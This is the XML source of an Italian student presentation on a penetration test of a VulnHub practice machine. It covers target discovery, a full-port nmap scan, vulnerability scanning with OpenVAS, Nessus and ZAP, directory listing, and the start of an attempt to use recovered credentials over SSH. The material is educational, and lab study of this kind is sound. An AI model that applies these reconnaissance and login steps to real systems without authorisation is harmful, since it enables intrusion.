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5"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="312" r:id="rId3"/>
    <p:sldId id="314" r:id="rId4"/>
    <p:sldId id="317" r:id="rId5"/>
    <p:sldId id="315" r:id="rId6"/>
    <p:sldId id="316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7" r:id="rId16"/>
    <p:sldId id="328" r:id="rId17"/>
    <p:sldId id="329" r:id="rId18"/>
    <p:sldId id="330" r:id="rId19"/>
    <p:sldId id="334" r:id="rId20"/>
    <p:sldId id="331" r:id="rId21"/>
    <p:sldId id="332" r:id="rId22"/>
    <p:sldId id="333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7" r:id="rId33"/>
    <p:sldId id="348" r:id="rId34"/>
    <p:sldId id="346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7" r:id="rId43"/>
    <p:sldId id="356" r:id="rId44"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Play" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId46"/>
      <p:bold r:id="rId47"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Sans Pro" panose="020B0503030403020204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId48"/>
      <p:bold r:id="rId49"/>
      <p:italic r:id="rId50"/>
      <p:boldItalic r:id="rId51"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Sans Pro SemiBold" panose="020B0603030403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BALDI" initials="AB" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="S::a.baldi20@studenti.unisa.it::7eb78af1-c7b3-4596-bfd4-a8190ce3d3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B345CE-6E03-40D0-8619-8E835BFBDCE3}">
  <a:tblStyle styleId="{12B345CE-6E03-40D0-8619-8E835BFBDC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0" y="516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883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0056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51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0564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529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236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10a69f0788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10a69f07881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2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76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32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52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4978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72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83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725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97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131" name="Google Shape;131;p4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-3170262" y="3452177"/>
            <a:ext cx="3721951" cy="12135923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2832750" y="621225"/>
            <a:ext cx="3478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232" name="Google Shape;2232;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1947251" y="-2064042"/>
            <a:ext cx="3721951" cy="12135923"/>
            <a:chOff x="-3170262" y="3452177"/>
            <a:chExt cx="3721951" cy="12135923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2233" name="Google Shape;2233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34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="-2665901" y="-1468542"/>
            <a:ext cx="3721951" cy="12135923"/>
            <a:chOff x="-3170262" y="3452177"/>
            <a:chExt cx="3721951" cy="12135923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2290" name="Google Shape;2290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6" name="Google Shape;2346;p34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="7369299" y="-4760179"/>
            <a:ext cx="3721951" cy="12135923"/>
            <a:chOff x="-3170262" y="3452177"/>
            <a:chExt cx="3721951" cy="12135923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2347" name="Google Shape;2347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34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8087949" y="-5355679"/>
            <a:ext cx="3721951" cy="12135923"/>
            <a:chOff x="-3170262" y="3452177"/>
            <a:chExt cx="3721951" cy="12135923"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2404" name="Google Shape;2404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1" name="Google Shape;2461;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832750" y="2720657"/>
            <a:ext cx="3478500" cy="8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 SemiBold"/>
              <a:buNone/>
              <a:defRPr sz="1600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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2462" name="Google Shape;2462;p34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2832750" y="4227600"/>
            <a:ext cx="3478500" cy="27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 SemiBold"/>
              <a:buNone/>
              <a:defRPr sz="12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80" r:id="rId6"/>
    <p:sldLayoutId id="2147483681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Progetto </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>Penetration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> Testing &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" err="1"/>
              <a:t>Ethical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analisi della macchina</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MHZ_CXF: C1F</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="it-IT"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" name="Google Shape;2639;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB8128A-9C1B-60F9-7083-C9B7369D19A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900438" y="3663720"/>
            <a:ext cx="1904485" cy="9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 dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Studente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Antonio Baldi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Matr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. 0522501185</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Google Shape;2639;p40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C13FB9F0-2AE3-35DE-2FD2-AC71A9629B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6339079" y="3731370"/>
            <a:ext cx="1904485" cy="9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7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Source Sans Pro"/>
              <a:buNone/>
              <a:defRPr sz="165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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Docente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Arcangelo Castiglione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D500FE93-F1BA-A24E-0AA1-0851DF1D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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>gathering</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:b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7DA5313-76D0-D055-D260-352763822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 sz="1800" dirty="0"/>
              <a:t>Informazioni fornite dall’autore della macchina virtuale, riportate sulla pagina di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0" err="1"/>
              <a:t>VulnHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Formato: Macchina virtuale (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> - OVA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Sistema operativo: Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Servizio DHCP: Abilitato</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Indirizzo IP: Assegnazione automatica</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Sono presenti due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Default page di Apache 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Login shell </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421488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558465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Target Discovery</a:t>
            </a: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Individuazione della macchina </a:t>
            </a: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98153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B2FFD0F-90D3-1A6F-0B3D-F100BC2C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Discovery – Ping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:b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6811C1F-88E9-9836-E92C-991ADC38A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25A6C86-FD39-859F-B0F9-14E695AD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61" y="1252675"/>
            <a:ext cx="7631664" cy="2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7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B2FFD0F-90D3-1A6F-0B3D-F100BC2C6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Discovery – OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Fingerprinting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6811C1F-88E9-9836-E92C-991ADC38A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12A813-3A52-C8D0-6D08-B5C6FEE5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803400"/>
            <a:ext cx="4083815" cy="20626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40C726-37E1-1037-2462-F073636C9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40" y="1803400"/>
            <a:ext cx="3702543" cy="20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7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558465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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target</a:t>
            </a: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Individuazione dei servizi esposti dalla macchina</a:t>
            </a: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430000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1879D63-A194-D865-ACC3-6F262212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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target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D79C5FC-2E75-F9C7-96CE-E6A9517D8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 sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> -A -T4 -p- 10.0.2.4 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> result.xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-36000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> -A esegue contemporaneamente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-36000"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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> (Service Version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-36000"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-O(Operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-36000"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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> (Script Scanning)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-36000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> (network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> -T4 (timing aggressive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> -p- (scansiona tutte le porte da 1 a 65535)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> result.xml (salva in formato XML l’output)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>L’output è stato convertito in HTML utilizzando il tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>xsltproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>fornendo una più chiara visualizzazione</a:t>
            </a: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11001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1879D63-A194-D865-ACC3-6F262212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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target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D79C5FC-2E75-F9C7-96CE-E6A9517D8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 sz="3200" dirty="0"/>
              <a:t>Dall’output risultano esposti dei servizi su due specifiche porte:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1" dirty="0"/>
              <a:t> 7.6p1 sulla porta 22</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1" dirty="0"/>
              <a:t>Apache-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="3200" b="1" dirty="0"/>
              <a:t> 2.4.29 sulla porta 80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5D3C151-4FA5-8B84-A065-CFD250D6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3641865"/>
            <a:ext cx="7722837" cy="1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8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576668" y="2393070"/>
            <a:ext cx="630855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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a: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dei problemi di sicurezza della macchina</a:t>
            </a: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173577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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:b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F354BA8-DF87-5265-D70B-DCBCA1BA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In primis sono stati utilizzati tool per la scansione di vulnerabilità automatica per individuare vulnerabilità già censite ed eventualmente sfruttarle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Sono stati utilizzati </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, ed in particolare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Zap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> specializzato nell’analisi di vulnerabilità web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>I risultati evidenziati dai primi due sono principalmente di livello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>cioè il web server lascia trapelare informazioni riguardante le versioni utilizzate e le configurazioni.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Zap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>, invece, ci elenca le seguenti vulnerabilità:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Header Content Security Policy (CSP) non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impostato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Mancanza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di header Anti-clickjacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mancanza</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di header X-Content-Type-Options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Information Disclosure - Suspicious Comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Server Leaks Version Information via "Server" HTTP Response Header Field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Queste</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> non </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>portano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>all’identificazione</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnerabilità</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ma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identificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>debolezze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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397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89B2D9-012C-CA5C-836C-69645F32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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping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3781B5-0877-145D-8468-52802FBFD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199000"/>
            <a:ext cx="4868425" cy="3369900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Analizzando manualmente il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>webserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t> possiamo navigare alla pagina che espone digitando come URL l’indirizzo IP della macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Il sito web risultante ci mostra la default page di Apache ed apparentemente non ci sono altre pagine navigabili</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>Procediamo, quindi, all’utilizzo di tool per il directory listing in modo da poter individuare tutte le pagine del sito web.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F073D7-46AF-C1DD-D07E-5A3C86352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29" y="1199000"/>
            <a:ext cx="2200064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75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53497" y="3073586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08972" y="3073586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908972" y="1743274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1743286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Recupero di informazioni riguardo la macchina analizzata</a:t>
            </a:r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831294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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r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5599" y="1732878"/>
            <a:ext cx="2547539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Strumenti Utilizzati</a:t>
            </a:r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Individuazione della macchina </a:t>
            </a:r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831294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Target Discovery</a:t>
            </a:r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“Scope” di cosa è stato analizzato</a:t>
            </a:r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59965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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scoping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515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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping - File e Directory Listing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F354BA8-DF87-5265-D70B-DCBCA1BA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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone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8609E5-52B1-D53E-63E3-A5DE0728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785865"/>
            <a:ext cx="3115825" cy="278303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573EAB-4BB3-0220-ACB2-A8A558EFA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393" y="1714500"/>
            <a:ext cx="3630332" cy="28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86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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping - File e Directory Listing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F354BA8-DF87-5265-D70B-DCBCA1BA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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone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C56FCD-4043-F893-1C11-D5D4753C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628775"/>
            <a:ext cx="7708860" cy="6617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387788C-D39C-53E6-5566-095A47CA1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2627073"/>
            <a:ext cx="4238641" cy="19189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95EEF2D-2678-4C93-3196-5E6FAD6A8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645" y="2456896"/>
            <a:ext cx="3133080" cy="21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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping - File e Directory Listing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F354BA8-DF87-5265-D70B-DCBCA1BA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</p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone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14DBC2B-150F-A8BB-A45D-E8DDC82A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655793"/>
            <a:ext cx="7000875" cy="27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72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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping - File e Directory Listing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F354BA8-DF87-5265-D70B-DCBCA1BA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695450"/>
            <a:ext cx="7717500" cy="2873450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone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242D9EB-A61A-A5DE-5D47-BF70ABD0A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62" y="1695450"/>
            <a:ext cx="7753137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4E41D74-C365-83E4-A524-5EFEB669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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping - File e Directory Listing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F354BA8-DF87-5265-D70B-DCBCA1BAD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695450"/>
            <a:ext cx="7717500" cy="2873450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone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BE76AED-86AB-ABC1-78DB-72D458A4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43" y="1632335"/>
            <a:ext cx="5240407" cy="16287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36657D2-7A83-4A44-55AA-8A16D78E2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49" y="3117038"/>
            <a:ext cx="3133691" cy="14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2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414813"/>
            <a:ext cx="630855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Target Exploitation</a:t>
            </a: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Sfruttamento delle vulnerabilità identificate</a:t>
            </a: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4230233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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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3449200" cy="3369900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Avendo recuperato delle ipotetiche credenziali ed in assenza di login page sul web server proviamo a collegarci con queste al servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" b="1" dirty="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> esposto sulla porta 22.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6BE56CE-5263-62C9-8D71-8A4D7570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93" y="1284425"/>
            <a:ext cx="4500962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09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079E5A1-27CE-49A4-9775-C35CF198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Exploitation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91130-69EE-0DEB-CE06-B20E8A57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2029975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
